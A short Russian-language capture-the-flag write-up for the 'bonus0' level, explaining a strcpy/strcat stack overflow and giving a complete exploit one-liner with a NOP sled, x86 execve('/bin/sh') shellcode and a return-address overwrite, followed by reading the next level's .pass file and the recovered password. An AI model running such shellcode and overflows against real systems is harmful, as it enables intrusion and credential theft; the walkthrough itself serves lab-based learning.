Программа дважды читает 4096 символов из стандартного ввода,
затем он усекает оба результата до 20 и заменяет \n на \0,
затем он объединяет их со знаком " " в главный буффер созданный в main.

У функции strcpy и strcat есть уязвимость, если в копируемой стороке не будет символа \0, то копирование не остановится,этим мы и воспользуемся.

При первом чтении мы переполним первый беффер, в которым будет наш шелл-код.
При втором чтении происходит переполнение указателя возврата в main.

(python -c 'print "A" * 20 + "\x90" * 200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' ; python -c 'print "A"*9+"\xbf\xff\xe6\xb8"[::-1] +"A"*7' ; cat) | ./bonus0
Попадаем в shell и введем cat /home/user/bonus1/.pass
Пароль: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9